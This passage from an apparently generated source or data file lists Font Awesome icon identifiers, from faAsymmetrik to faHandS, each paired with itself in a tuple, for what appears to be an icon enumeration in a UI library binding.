k","faAsymmetrik"),("faAt","faAt"),("faAtlas","faAtlas"),("faAtlassian","faAtlassian"),("faAtom","faAtom"),("faAtomAlt","faAtomAlt"),("faAudible","faAudible"),("faAudioDescription","faAudioDescription"),("faAutoprefixer","faAutoprefixer"),("faAvianex","faAvianex"),("faAviato","faAviato"),("faAward","faAward"),("faAws","faAws"),("faAxe","faAxe"),("faAxeBattle","faAxeBattle"),("faBaby","faBaby"),("faBabyCarriage","faBabyCarriage"),("faBackpack","faBackpack"),("faBackspace","faBackspace"),("faBackward","faBackward"),("faBacon","faBacon"),("faBacteria","faBacteria"),("faBacterium","faBacterium"),("faBadge","faBadge"),("faBadgeCheck","faBadgeCheck"),("faBadgeDollar","faBadgeDollar"),("faBadgePercent","faBadgePercent"),("faBadgeSheriff","faBadgeSheriff"),("faBadgerHoney","faBadgerHoney"),("faBagsShopping","faBagsShopping"),("faBahai","faBahai"),("faBalanceScale","faBalanceScale"),("faBalanceScaleLeft","faBalanceScaleLeft"),("faBalanceScaleRight","faBalanceScaleRight"),("faBallPile","faBallPile"),("faBallot","faBallot"),("faBallotCheck","faBallotCheck"),("faBan","faBan"),("faBandAid","faBandAid"),("faBandcamp","faBandcamp"),("faBanjo","faBanjo"),("faBarcode","faBarcode"),("faBarcodeAlt","faBarcodeAlt"),("faBarcodeRead","faBarcodeRead"),("faBarcodeScan","faBarcodeScan"),("faBars","faBars"),("faBaseball","faBaseball"),("faBaseballBall","faBaseballBall"),("faBasketballBall","faBasketballBall"),("faBasketballHoop","faBasketballHoop"),("faBat","faBat"),("faBath","faBath"),("faBatteryBolt","faBatteryBolt"),("faBatteryEmpty","faBatteryEmpty"),("faBatteryFull","faBatteryFull"),("faBatteryHalf","faBatteryHalf"),("faBatteryQuarter","faBatteryQuarter"),("faBatterySlash","faBatterySlash"),("faBatteryThreeQuarters","faBatteryThreeQuarters"),("faBattleNet","faBattleNet"),("faBed","faBed"),("faBedAlt","faBedAlt"),("faBedBunk","faBedBunk"),("faBedEmpty","faBedEmpty"),("faBeer","faBeer"),("faBehance","faBehance"),("faBehanceSquare","faBehanceSquare"),("faBell","faBell"),("faBellExclamation
","faBellExclamation"),("faBellOn","faBellOn"),("faBellPlus","faBellPlus"),("faBellSchool","faBellSchool"),("faBellSchoolSlash","faBellSchoolSlash"),("faBellSlash","faBellSlash"),("faBells","faBells"),("faBetamax","faBetamax"),("faBezierCurve","faBezierCurve"),("faBible","faBible"),("faBicycle","faBicycle"),("faBiking","faBiking"),("faBikingMountain","faBikingMountain"),("faBimobject","faBimobject"),("faBinoculars","faBinoculars"),("faBiohazard","faBiohazard"),("faBirthdayCake","faBirthdayCake"),("faBitbucket","faBitbucket"),("faBitcoin","faBitcoin"),("faBity","faBity"),("faBlackTie","faBlackTie"),("faBlackberry","faBlackberry"),("faBlanket","faBlanket"),("faBlender","faBlender"),("faBlenderPhone","faBlenderPhone"),("faBlind","faBlind"),("faBlinds","faBlinds"),("faBlindsOpen","faBlindsOpen"),("faBlindsRaised","faBlindsRaised"),("faBlog","faBlog"),("faBlogger","faBlogger"),("faBloggerB","faBloggerB"),("faBluetooth","faBluetooth"),("faBluetoothB","faBluetoothB"),("faBold","faBold"),("faBolt","faBolt"),("faBomb","faBomb"),("faBone","faBone"),("faBoneBreak","faBoneBreak"),("faBong","faBong"),("faBook","faBook"),("faBookAlt","faBookAlt"),("faBookDead","faBookDead"),("faBookHeart","faBookHeart"),("faBookMedical","faBookMedical"),("faBookOpen","faBookOpen"),("faBookReader","faBookReader"),("faBookSpells","faBookSpells"),("faBookUser","faBookUser"),("faBookmark","faBookmark"),("faBooks","faBooks"),("faBooksMedical","faBooksMedical"),("faBoombox","faBoombox"),("faBoot","faBoot"),("faBoothCurtain","faBoothCurtain"),("faBootstrap","faBootstrap"),("faBorderAll","faBorderAll"),("faBorderBottom","faBorderBottom"),("faBorderCenterH","faBorderCenterH"),("faBorderCenterV","faBorderCenterV"),("faBorderInner","faBorderInner"),("faBorderLeft","faBorderLeft"),("faBorderNone","faBorderNone"),("faBorderOuter","faBorderOuter"),("faBorderRight","faBorderRight"),("faBorderStyle","faBorderStyle"),("faBorderStyleAlt","faBorderStyleAlt"),("faBorderTop","faBorderTop"),("faBowArrow","faBowArrow")
,("faBowlingBall","faBowlingBall"),("faBowlingPins","faBowlingPins"),("faBox","faBox"),("faBoxAlt","faBoxAlt"),("faBoxBallot","faBoxBallot"),("faBoxCheck","faBoxCheck"),("faBoxFragile","faBoxFragile"),("faBoxFull","faBoxFull"),("faBoxHeart","faBoxHeart"),("faBoxOpen","faBoxOpen"),("faBoxTissue","faBoxTissue"),("faBoxUp","faBoxUp"),("faBoxUsd","faBoxUsd"),("faBoxes","faBoxes"),("faBoxesAlt","faBoxesAlt"),("faBoxingGlove","faBoxingGlove"),("faBrackets","faBrackets"),("faBracketsCurly","faBracketsCurly"),("faBraille","faBraille"),("faBrain","faBrain"),("faBreadLoaf","faBreadLoaf"),("faBreadSlice","faBreadSlice"),("faBriefcase","faBriefcase"),("faBriefcaseMedical","faBriefcaseMedical"),("faBringForward","faBringForward"),("faBringFront","faBringFront"),("faBroadcastTower","faBroadcastTower"),("faBroom","faBroom"),("faBrowser","faBrowser"),("faBrush","faBrush"),("faBtc","faBtc"),("faBuffer","faBuffer"),("faBug","faBug"),("faBuilding","faBuilding"),("faBullhorn","faBullhorn"),("faBullseye","faBullseye"),("faBullseyeArrow","faBullseyeArrow"),("faBullseyePointer","faBullseyePointer"),("faBurgerSoda","faBurgerSoda"),("faBurn","faBurn"),("faBuromobelexperte","faBuromobelexperte"),("faBurrito","faBurrito"),("faBus","faBus"),("faBusAlt","faBusAlt"),("faBusSchool","faBusSchool"),("faBusinessTime","faBusinessTime"),("faBuyNLarge","faBuyNLarge"),("faBuysellads","faBuysellads"),("faCabinetFiling","faCabinetFiling"),("faCactus","faCactus"),("faCalculator","faCalculator"),("faCalculatorAlt","faCalculatorAlt"),("faCalendar","faCalendar"),("faCalendarAlt","faCalendarAlt"),("faCalendarCheck","faCalendarCheck"),("faCalendarDay","faCalendarDay"),("faCalendarEdit","faCalendarEdit"),("faCalendarExclamation","faCalendarExclamation"),("faCalendarMinus","faCalendarMinus"),("faCalendarPlus","faCalendarPlus"),("faCalendarStar","faCalendarStar"),("faCalendarTimes","faCalendarTimes"),("faCalendarWeek","faCalendarWeek"),("faCamcorder","faCamcorder"),("faCamera","faCamera"),("faCameraAlt","faCameraA
lt"),("faCameraHome","faCameraHome"),("faCameraMovie","faCameraMovie"),("faCameraPolaroid","faCameraPolaroid"),("faCameraRetro","faCameraRetro"),("faCampfire","faCampfire"),("faCampground","faCampground"),("faCanadianMapleLeaf","faCanadianMapleLeaf"),("faCandleHolder","faCandleHolder"),("faCandyCane","faCandyCane"),("faCandyCorn","faCandyCorn"),("faCannabis","faCannabis"),("faCapsules","faCapsules"),("faCar","faCar"),("faCarAlt","faCarAlt"),("faCarBattery","faCarBattery"),("faCarBuilding","faCarBuilding"),("faCarBump","faCarBump"),("faCarBus","faCarBus"),("faCarCrash","faCarCrash"),("faCarGarage","faCarGarage"),("faCarMechanic","faCarMechanic"),("faCarSide","faCarSide"),("faCarTilt","faCarTilt"),("faCarWash","faCarWash"),("faCaravan","faCaravan"),("faCaravanAlt","faCaravanAlt"),("faCaretCircleDown","faCaretCircleDown"),("faCaretCircleLeft","faCaretCircleLeft"),("faCaretCircleRight","faCaretCircleRight"),("faCaretCircleUp","faCaretCircleUp"),("faCaretDown","faCaretDown"),("faCaretLeft","faCaretLeft"),("faCaretRight","faCaretRight"),("faCaretSquareDown","faCaretSquareDown"),("faCaretSquareLeft","faCaretSquareLeft"),("faCaretSquareRight","faCaretSquareRight"),("faCaretSquareUp","faCaretSquareUp"),("faCaretUp","faCaretUp"),("faCarrot","faCarrot"),("faCars","faCars"),("faCartArrowDown","faCartArrowDown"),("faCartPlus","faCartPlus"),("faCashRegister","faCashRegister"),("faCassetteTape","faCassetteTape"),("faCat","faCat"),("faCatSpace","faCatSpace"),("faCauldron","faCauldron"),("faCcAmazonPay","faCcAmazonPay"),("faCcAmex","faCcAmex"),("faCcApplePay","faCcApplePay"),("faCcDinersClub","faCcDinersClub"),("faCcDiscover","faCcDiscover"),("faCcJcb","faCcJcb"),("faCcMastercard","faCcMastercard"),("faCcPaypal","faCcPaypal"),("faCcStripe","faCcStripe"),("faCcVisa","faCcVisa"),("faCctv","faCctv"),("faCentercode","faCentercode"),("faCentos","faCentos"),("faCertificate","faCertificate"),("faChair","faChair"),("faChairOffice","faChairOffice"),("faChalkboard","faChalkboard"),("faChalkbo
ardTeacher","faChalkboardTeacher"),("faChargingStation","faChargingStation"),("faChartArea","faChartArea"),("faChartBar","faChartBar"),("faChartLine","faChartLine"),("faChartLineDown","faChartLineDown"),("faChartNetwork","faChartNetwork"),("faChartPie","faChartPie"),("faChartPieAlt","faChartPieAlt"),("faChartScatter","faChartScatter"),("faCheck","faCheck"),("faCheckCircle","faCheckCircle"),("faCheckDouble","faCheckDouble"),("faCheckSquare","faCheckSquare"),("faCheese","faCheese"),("faCheeseSwiss","faCheeseSwiss"),("faCheeseburger","faCheeseburger"),("faChess","faChess"),("faChessBishop","faChessBishop"),("faChessBishopAlt","faChessBishopAlt"),("faChessBoard","faChessBoard"),("faChessClock","faChessClock"),("faChessClockAlt","faChessClockAlt"),("faChessKing","faChessKing"),("faChessKingAlt","faChessKingAlt"),("faChessKnight","faChessKnight"),("faChessKnightAlt","faChessKnightAlt"),("faChessPawn","faChessPawn"),("faChessPawnAlt","faChessPawnAlt"),("faChessQueen","faChessQueen"),("faChessQueenAlt","faChessQueenAlt"),("faChessRook","faChessRook"),("faChessRookAlt","faChessRookAlt"),("faChevronCircleDown","faChevronCircleDown"),("faChevronCircleLeft","faChevronCircleLeft"),("faChevronCircleRight","faChevronCircleRight"),("faChevronCircleUp","faChevronCircleUp"),("faChevronDoubleDown","faChevronDoubleDown"),("faChevronDoubleLeft","faChevronDoubleLeft"),("faChevronDoubleRight","faChevronDoubleRight"),("faChevronDoubleUp","faChevronDoubleUp"),("faChevronDown","faChevronDown"),("faChevronLeft","faChevronLeft"),("faChevronRight","faChevronRight"),("faChevronSquareDown","faChevronSquareDown"),("faChevronSquareLeft","faChevronSquareLeft"),("faChevronSquareRight","faChevronSquareRight"),("faChevronSquareUp","faChevronSquareUp"),("faChevronUp","faChevronUp"),("faChild","faChild"),("faChimney","faChimney"),("faChrome","faChrome"),("faChromecast","faChromecast"),("faChurch","faChurch"),("faCircle","faCircle"),("faCircleNotch","faCircleNotch"),("faCity","faCity"),("faClarinet","faCl
arinet"),("faClawMarks","faClawMarks"),("faClinicMedical","faClinicMedical"),("faClipboard","faClipboard"),("faClipboardCheck","faClipboardCheck"),("faClipboardList","faClipboardList"),("faClipboardListCheck","faClipboardListCheck"),("faClipboardPrescription","faClipboardPrescription"),("faClipboardUser","faClipboardUser"),("faClock","faClock"),("faClone","faClone"),("faClosedCaptioning","faClosedCaptioning"),("faCloud","faCloud"),("faCloudDownload","faCloudDownload"),("faCloudDownloadAlt","faCloudDownloadAlt"),("faCloudDrizzle","faCloudDrizzle"),("faCloudHail","faCloudHail"),("faCloudHailMixed","faCloudHailMixed"),("faCloudMeatball","faCloudMeatball"),("faCloudMoon","faCloudMoon"),("faCloudMoonRain","faCloudMoonRain"),("faCloudMusic","faCloudMusic"),("faCloudRain","faCloudRain"),("faCloudRainbow","faCloudRainbow"),("faCloudShowers","faCloudShowers"),("faCloudShowersHeavy","faCloudShowersHeavy"),("faCloudSleet","faCloudSleet"),("faCloudSnow","faCloudSnow"),("faCloudSun","faCloudSun"),("faCloudSunRain","faCloudSunRain"),("faCloudUpload","faCloudUpload"),("faCloudUploadAlt","faCloudUploadAlt"),("faCloudflare","faCloudflare"),("faClouds","faClouds"),("faCloudsMoon","faCloudsMoon"),("faCloudsSun","faCloudsSun"),("faCloudscale","faCloudscale"),("faCloudsmith","faCloudsmith"),("faCloudversify","faCloudversify"),("faClub","faClub"),("faCocktail","faCocktail"),("faCode","faCode"),("faCodeBranch","faCodeBranch"),("faCodeCommit","faCodeCommit"),("faCodeMerge","faCodeMerge"),("faCodepen","faCodepen"),("faCodiepie","faCodiepie"),("faCoffee","faCoffee"),("faCoffeePot","faCoffeePot"),("faCoffeeTogo","faCoffeeTogo"),("faCoffin","faCoffin"),("faCoffinCross","faCoffinCross"),("faCog","faCog"),("faCogs","faCogs"),("faCoin","faCoin"),("faCoins","faCoins"),("faColumns","faColumns"),("faComet","faComet"),("faComment","faComment"),("faCommentAlt","faCommentAlt"),("faCommentAltCheck","faCommentAltCheck"),("faCommentAltDollar","faCommentAltDollar"),("faCommentAltDots","faCommentAltDots"),(
"faCommentAltEdit","faCommentAltEdit"),("faCommentAltExclamation","faCommentAltExclamation"),("faCommentAltLines","faCommentAltLines"),("faCommentAltMedical","faCommentAltMedical"),("faCommentAltMinus","faCommentAltMinus"),("faCommentAltMusic","faCommentAltMusic"),("faCommentAltPlus","faCommentAltPlus"),("faCommentAltSlash","faCommentAltSlash"),("faCommentAltSmile","faCommentAltSmile"),("faCommentAltTimes","faCommentAltTimes"),("faCommentCheck","faCommentCheck"),("faCommentDollar","faCommentDollar"),("faCommentDots","faCommentDots"),("faCommentEdit","faCommentEdit"),("faCommentExclamation","faCommentExclamation"),("faCommentLines","faCommentLines"),("faCommentMedical","faCommentMedical"),("faCommentMinus","faCommentMinus"),("faCommentMusic","faCommentMusic"),("faCommentPlus","faCommentPlus"),("faCommentSlash","faCommentSlash"),("faCommentSmile","faCommentSmile"),("faCommentTimes","faCommentTimes"),("faComments","faComments"),("faCommentsAlt","faCommentsAlt"),("faCommentsAltDollar","faCommentsAltDollar"),("faCommentsDollar","faCommentsDollar"),("faCompactDisc","faCompactDisc"),("faCompass","faCompass"),("faCompassSlash","faCompassSlash"),("faCompress","faCompress"),("faCompressAlt","faCompressAlt"),("faCompressArrowsAlt","faCompressArrowsAlt"),("faCompressWide","faCompressWide"),("faComputerClassic","faComputerClassic"),("faComputerSpeaker","faComputerSpeaker"),("faConciergeBell","faConciergeBell"),("faConfluence","faConfluence"),("faConnectdevelop","faConnectdevelop"),("faConstruction","faConstruction"),("faContainerStorage","faContainerStorage"),("faContao","faContao"),("faConveyorBelt","faConveyorBelt"),("faConveyorBeltAlt","faConveyorBeltAlt"),("faCookie","faCookie"),("faCookieBite","faCookieBite"),("faCopy","faCopy"),("faCopyright","faCopyright"),("faCorn","faCorn"),("faCottonBureau","faCottonBureau"),("faCouch","faCouch"),("faCow","faCow"),("faCowbell","faCowbell"),("faCowbellMore","faCowbellMore"),("faCpanel","faCpanel"),("faCreativeCommons","faCreativeCommons
"),("faCreativeCommonsBy","faCreativeCommonsBy"),("faCreativeCommonsNc","faCreativeCommonsNc"),("faCreativeCommonsNcEu","faCreativeCommonsNcEu"),("faCreativeCommonsNcJp","faCreativeCommonsNcJp"),("faCreativeCommonsNd","faCreativeCommonsNd"),("faCreativeCommonsPd","faCreativeCommonsPd"),("faCreativeCommonsPdAlt","faCreativeCommonsPdAlt"),("faCreativeCommonsRemix","faCreativeCommonsRemix"),("faCreativeCommonsSa","faCreativeCommonsSa"),("faCreativeCommonsSampling","faCreativeCommonsSampling"),("faCreativeCommonsSamplingPlus","faCreativeCommonsSamplingPlus"),("faCreativeCommonsShare","faCreativeCommonsShare"),("faCreativeCommonsZero","faCreativeCommonsZero"),("faCreditCard","faCreditCard"),("faCreditCardBlank","faCreditCardBlank"),("faCreditCardFront","faCreditCardFront"),("faCricket","faCricket"),("faCriticalRole","faCriticalRole"),("faCroissant","faCroissant"),("faCrop","faCrop"),("faCropAlt","faCropAlt"),("faCross","faCross"),("faCrosshairs","faCrosshairs"),("faCrow","faCrow"),("faCrown","faCrown"),("faCrutch","faCrutch"),("faCrutches","faCrutches"),("faCss3","faCss3"),("faCss3Alt","faCss3Alt"),("faCube","faCube"),("faCubes","faCubes"),("faCurling","faCurling"),("faCut","faCut"),("faCuttlefish","faCuttlefish"),("faDAndD","faDAndD"),("faDAndDBeyond","faDAndDBeyond"),("faDagger","faDagger"),("faDailymotion","faDailymotion"),("faDashcube","faDashcube"),("faDatabase","faDatabase"),("faDeaf","faDeaf"),("faDebug","faDebug"),("faDeer","faDeer"),("faDeerRudolph","faDeerRudolph"),("faDeezer","faDeezer"),("faDelicious","faDelicious"),("faDemocrat","faDemocrat"),("faDeploydog","faDeploydog"),("faDeskpro","faDeskpro"),("faDesktop","faDesktop"),("faDesktopAlt","faDesktopAlt"),("faDev","faDev"),("faDeviantart","faDeviantart"),("faDewpoint","faDewpoint"),("faDharmachakra","faDharmachakra"),("faDhl","faDhl"),("faDiagnoses","faDiagnoses"),("faDiamond","faDiamond"),("faDiaspora","faDiaspora"),("faDice","faDice"),("faDiceD10","faDiceD10"),("faDiceD12","faDiceD12"),("faDiceD20","faDiceD
20"),("faDiceD4","faDiceD4"),("faDiceD6","faDiceD6"),("faDiceD8","faDiceD8"),("faDiceFive","faDiceFive"),("faDiceFour","faDiceFour"),("faDiceOne","faDiceOne"),("faDiceSix","faDiceSix"),("faDiceThree","faDiceThree"),("faDiceTwo","faDiceTwo"),("faDigg","faDigg"),("faDigging","faDigging"),("faDigitalOcean","faDigitalOcean"),("faDigitalTachograph","faDigitalTachograph"),("faDiploma","faDiploma"),("faDirections","faDirections"),("faDiscDrive","faDiscDrive"),("faDiscord","faDiscord"),("faDiscourse","faDiscourse"),("faDisease","faDisease"),("faDivide","faDivide"),("faDizzy","faDizzy"),("faDna","faDna"),("faDoNotEnter","faDoNotEnter"),("faDochub","faDochub"),("faDocker","faDocker"),("faDog","faDog"),("faDogLeashed","faDogLeashed"),("faDollarSign","faDollarSign"),("faDolly","faDolly"),("faDollyEmpty","faDollyEmpty"),("faDollyFlatbed","faDollyFlatbed"),("faDollyFlatbedAlt","faDollyFlatbedAlt"),("faDollyFlatbedEmpty","faDollyFlatbedEmpty"),("faDonate","faDonate"),("faDoorClosed","faDoorClosed"),("faDoorOpen","faDoorOpen"),("faDotCircle","faDotCircle"),("faDove","faDove"),("faDownload","faDownload"),("faDraft2digital","faDraft2digital"),("faDraftingCompass","faDraftingCompass"),("faDragon","faDragon"),("faDrawCircle","faDrawCircle"),("faDrawPolygon","faDrawPolygon"),("faDrawSquare","faDrawSquare"),("faDreidel","faDreidel"),("faDribbble","faDribbble"),("faDribbbleSquare","faDribbbleSquare"),("faDrone","faDrone"),("faDroneAlt","faDroneAlt"),("faDropbox","faDropbox"),("faDrum","faDrum"),("faDrumSteelpan","faDrumSteelpan"),("faDrumstick","faDrumstick"),("faDrumstickBite","faDrumstickBite"),("faDrupal","faDrupal"),("faDryer","faDryer"),("faDryerAlt","faDryerAlt"),("faDuck","faDuck"),("faDumbbell","faDumbbell"),("faDumpster","faDumpster"),("faDumpsterFire","faDumpsterFire"),("faDungeon","faDungeon"),("faDyalog","faDyalog"),("faEar","faEar"),("faEarMuffs","faEarMuffs"),("faEarlybirds","faEarlybirds"),("faEbay","faEbay"),("faEclipse","faEclipse"),("faEclipseAlt","faEclipseAlt"),("faEdg
e","faEdge"),("faEdgeLegacy","faEdgeLegacy"),("faEdit","faEdit"),("faEgg","faEgg"),("faEggFried","faEggFried"),("faEject","faEject"),("faElementor","faElementor"),("faElephant","faElephant"),("faEllipsisH","faEllipsisH"),("faEllipsisHAlt","faEllipsisHAlt"),("faEllipsisV","faEllipsisV"),("faEllipsisVAlt","faEllipsisVAlt"),("faEllo","faEllo"),("faEmber","faEmber"),("faEmpire","faEmpire"),("faEmptySet","faEmptySet"),("faEngineWarning","faEngineWarning"),("faEnvelope","faEnvelope"),("faEnvelopeOpen","faEnvelopeOpen"),("faEnvelopeOpenDollar","faEnvelopeOpenDollar"),("faEnvelopeOpenText","faEnvelopeOpenText"),("faEnvelopeSquare","faEnvelopeSquare"),("faEnvira","faEnvira"),("faEquals","faEquals"),("faEraser","faEraser"),("faErlang","faErlang"),("faEthereum","faEthereum"),("faEthernet","faEthernet"),("faEtsy","faEtsy"),("faEuroSign","faEuroSign"),("faEvernote","faEvernote"),("faExchange","faExchange"),("faExchangeAlt","faExchangeAlt"),("faExclamation","faExclamation"),("faExclamationCircle","faExclamationCircle"),("faExclamationSquare","faExclamationSquare"),("faExclamationTriangle","faExclamationTriangle"),("faExpand","faExpand"),("faExpandAlt","faExpandAlt"),("faExpandArrows","faExpandArrows"),("faExpandArrowsAlt","faExpandArrowsAlt"),("faExpandWide","faExpandWide"),("faExpeditedssl","faExpeditedssl"),("faExternalLink","faExternalLink"),("faExternalLinkAlt","faExternalLinkAlt"),("faExternalLinkSquare","faExternalLinkSquare"),("faExternalLinkSquareAlt","faExternalLinkSquareAlt"),("faEye","faEye"),("faEyeDropper","faEyeDropper"),("faEyeEvil","faEyeEvil"),("faEyeSlash","faEyeSlash"),("faFacebook","faFacebook"),("faFacebookF","faFacebookF"),("faFacebookMessenger","faFacebookMessenger"),("faFacebookSquare","faFacebookSquare"),("faFan","faFan"),("faFanTable","faFanTable"),("faFantasyFlightGames","faFantasyFlightGames"),("faFarm","faFarm"),("faFastBackward","faFastBackward"),("faFastForward","faFastForward"),("faFaucet","faFaucet"),("faFaucetDrip","faFaucetDrip"),("faFax","faFax
"),("faFeather","faFeather"),("faFeatherAlt","faFeatherAlt"),("faFedex","faFedex"),("faFedora","faFedora"),("faFemale","faFemale"),("faFieldHockey","faFieldHockey"),("faFighterJet","faFighterJet"),("faFigma","faFigma"),("faFile","faFile"),("faFileAlt","faFileAlt"),("faFileArchive","faFileArchive"),("faFileAudio","faFileAudio"),("faFileCertificate","faFileCertificate"),("faFileChartLine","faFileChartLine"),("faFileChartPie","faFileChartPie"),("faFileCheck","faFileCheck"),("faFileCode","faFileCode"),("faFileContract","faFileContract"),("faFileCsv","faFileCsv"),("faFileDownload","faFileDownload"),("faFileEdit","faFileEdit"),("faFileExcel","faFileExcel"),("faFileExclamation","faFileExclamation"),("faFileExport","faFileExport"),("faFileImage","faFileImage"),("faFileImport","faFileImport"),("faFileInvoice","faFileInvoice"),("faFileInvoiceDollar","faFileInvoiceDollar"),("faFileMedical","faFileMedical"),("faFileMedicalAlt","faFileMedicalAlt"),("faFileMinus","faFileMinus"),("faFileMusic","faFileMusic"),("faFilePdf","faFilePdf"),("faFilePlus","faFilePlus"),("faFilePowerpoint","faFilePowerpoint"),("faFilePrescription","faFilePrescription"),("faFileSearch","faFileSearch"),("faFileSignature","faFileSignature"),("faFileSpreadsheet","faFileSpreadsheet"),("faFileTimes","faFileTimes"),("faFileUpload","faFileUpload"),("faFileUser","faFileUser"),("faFileVideo","faFileVideo"),("faFileWord","faFileWord"),("faFilesMedical","faFilesMedical"),("faFill","faFill"),("faFillDrip","faFillDrip"),("faFilm","faFilm"),("faFilmAlt","faFilmAlt"),("faFilmCanister","faFilmCanister"),("faFilter","faFilter"),("faFingerprint","faFingerprint"),("faFire","faFire"),("faFireAlt","faFireAlt"),("faFireExtinguisher","faFireExtinguisher"),("faFireSmoke","faFireSmoke"),("faFirefox","faFirefox"),("faFirefoxBrowser","faFirefoxBrowser"),("faFireplace","faFireplace"),("faFirstAid","faFirstAid"),("faFirstOrder","faFirstOrder"),("faFirstOrderAlt","faFirstOrderAlt"),("faFirstdraft","faFirstdraft"),("faFish","faFish"),("f
aFishCooked","faFishCooked"),("faFistRaised","faFistRaised"),("faFlag","faFlag"),("faFlagAlt","faFlagAlt"),("faFlagCheckered","faFlagCheckered"),("faFlagUsa","faFlagUsa"),("faFlame","faFlame"),("faFlashlight","faFlashlight"),("faFlask","faFlask"),("faFlaskPoison","faFlaskPoison"),("faFlaskPotion","faFlaskPotion"),("faFlickr","faFlickr"),("faFlipboard","faFlipboard"),("faFlower","faFlower"),("faFlowerDaffodil","faFlowerDaffodil"),("faFlowerTulip","faFlowerTulip"),("faFlushed","faFlushed"),("faFlute","faFlute"),("faFluxCapacitor","faFluxCapacitor"),("faFly","faFly"),("faFog","faFog"),("faFolder","faFolder"),("faFolderDownload","faFolderDownload"),("faFolderMinus","faFolderMinus"),("faFolderOpen","faFolderOpen"),("faFolderPlus","faFolderPlus"),("faFolderTimes","faFolderTimes"),("faFolderTree","faFolderTree"),("faFolderUpload","faFolderUpload"),("faFolders","faFolders"),("faFont","faFont"),("faFontAwesome","faFontAwesome"),("faFontAwesomeAlt","faFontAwesomeAlt"),("faFontAwesomeFlag","faFontAwesomeFlag"),("faFontAwesomeLogoFull","faFontAwesomeLogoFull"),("faFontCase","faFontCase"),("faFonticons","faFonticons"),("faFonticonsFi","faFonticonsFi"),("faFootballBall","faFootballBall"),("faFootballHelmet","faFootballHelmet"),("faForklift","faForklift"),("faFortAwesome","faFortAwesome"),("faFortAwesomeAlt","faFortAwesomeAlt"),("faForumbee","faForumbee"),("faForward","faForward"),("faFoursquare","faFoursquare"),("faFragile","faFragile"),("faFreeCodeCamp","faFreeCodeCamp"),("faFreebsd","faFreebsd"),("faFrenchFries","faFrenchFries"),("faFrog","faFrog"),("faFrostyHead","faFrostyHead"),("faFrown","faFrown"),("faFrownOpen","faFrownOpen"),("faFulcrum","faFulcrum"),("faFunction","faFunction"),("faFunnelDollar","faFunnelDollar"),("faFutbol","faFutbol"),("faGalacticRepublic","faGalacticRepublic"),("faGalacticSenate","faGalacticSenate"),("faGalaxy","faGalaxy"),("faGameBoard","faGameBoard"),("faGameBoardAlt","faGameBoardAlt"),("faGameConsoleHandheld","faGameConsoleHandheld"),("faGamepad","f
aGamepad"),("faGamepadAlt","faGamepadAlt"),("faGarage","faGarage"),("faGarageCar","faGarageCar"),("faGarageOpen","faGarageOpen"),("faGasPump","faGasPump"),("faGasPumpSlash","faGasPumpSlash"),("faGavel","faGavel"),("faGem","faGem"),("faGenderless","faGenderless"),("faGetPocket","faGetPocket"),("faGg","faGg"),("faGgCircle","faGgCircle"),("faGhost","faGhost"),("faGift","faGift"),("faGiftCard","faGiftCard"),("faGifts","faGifts"),("faGingerbreadMan","faGingerbreadMan"),("faGit","faGit"),("faGitAlt","faGitAlt"),("faGitSquare","faGitSquare"),("faGithub","faGithub"),("faGithubAlt","faGithubAlt"),("faGithubSquare","faGithubSquare"),("faGitkraken","faGitkraken"),("faGitlab","faGitlab"),("faGitter","faGitter"),("faGlass","faGlass"),("faGlassChampagne","faGlassChampagne"),("faGlassCheers","faGlassCheers"),("faGlassCitrus","faGlassCitrus"),("faGlassMartini","faGlassMartini"),("faGlassMartiniAlt","faGlassMartiniAlt"),("faGlassWhiskey","faGlassWhiskey"),("faGlassWhiskeyRocks","faGlassWhiskeyRocks"),("faGlasses","faGlasses"),("faGlassesAlt","faGlassesAlt"),("faGlide","faGlide"),("faGlideG","faGlideG"),("faGlobe","faGlobe"),("faGlobeAfrica","faGlobeAfrica"),("faGlobeAmericas","faGlobeAmericas"),("faGlobeAsia","faGlobeAsia"),("faGlobeEurope","faGlobeEurope"),("faGlobeSnow","faGlobeSnow"),("faGlobeStand","faGlobeStand"),("faGofore","faGofore"),("faGolfBall","faGolfBall"),("faGolfClub","faGolfClub"),("faGoodreads","faGoodreads"),("faGoodreadsG","faGoodreadsG"),("faGoogle","faGoogle"),("faGoogleDrive","faGoogleDrive"),("faGooglePay","faGooglePay"),("faGooglePlay","faGooglePlay"),("faGooglePlus","faGooglePlus"),("faGooglePlusG","faGooglePlusG"),("faGooglePlusSquare","faGooglePlusSquare"),("faGoogleWallet","faGoogleWallet"),("faGopuram","faGopuram"),("faGraduationCap","faGraduationCap"),("faGramophone","faGramophone"),("faGratipay","faGratipay"),("faGrav","faGrav"),("faGreaterThan","faGreaterThan"),("faGreaterThanEqual","faGreaterThanEqual"),("faGrimace","faGrimace"),("faGrin","faGrin"),(
"faGrinAlt","faGrinAlt"),("faGrinBeam","faGrinBeam"),("faGrinBeamSweat","faGrinBeamSweat"),("faGrinHearts","faGrinHearts"),("faGrinSquint","faGrinSquint"),("faGrinSquintTears","faGrinSquintTears"),("faGrinStars","faGrinStars"),("faGrinTears","faGrinTears"),("faGrinTongue","faGrinTongue"),("faGrinTongueSquint","faGrinTongueSquint"),("faGrinTongueWink","faGrinTongueWink"),("faGrinWink","faGrinWink"),("faGripHorizontal","faGripHorizontal"),("faGripLines","faGripLines"),("faGripLinesVertical","faGripLinesVertical"),("faGripVertical","faGripVertical"),("faGripfire","faGripfire"),("faGrunt","faGrunt"),("faGuilded","faGuilded"),("faGuitar","faGuitar"),("faGuitarElectric","faGuitarElectric"),("faGuitars","faGuitars"),("faGulp","faGulp"),("faHSquare","faHSquare"),("faH1","faH1"),("faH2","faH2"),("faH3","faH3"),("faH4","faH4"),("faHackerNews","faHackerNews"),("faHackerNewsSquare","faHackerNewsSquare"),("faHackerrank","faHackerrank"),("faHamburger","faHamburger"),("faHammer","faHammer"),("faHammerWar","faHammerWar"),("faHamsa","faHamsa"),("faHandHeart","faHandHeart"),("faHandHolding","faHandHolding"),("faHandHoldingBox","faHandHoldingBox"),("faHandHoldingHeart","faHandHoldingHeart"),("faHandHoldingMagic","faHandHoldingMagic"),("faHandHoldingMedical","faHandHoldingMedical"),("faHandHoldingSeedling","faHandHoldingSeedling"),("faHandHoldingUsd","faHandHoldingUsd"),("faHandHoldingWater","faHandHoldingWater"),("faHandLizard","faHandLizard"),("faHandMiddleFinger","faHandMiddleFinger"),("faHandPaper","faHandPaper"),("faHandPeace","faHandPeace"),("faHandPointDown","faHandPointDown"),("faHandPointLeft","faHandPointLeft"),("faHandPointRight","faHandPointRight"),("faHandPointUp","faHandPointUp"),("faHandPointer","faHandPointer"),("faHandReceiving","faHandReceiving"),("faHandRock","faHandRock"),("faHandScissors","faHandScissors"),("faHandSparkles","faHandSparkles"),("faHandS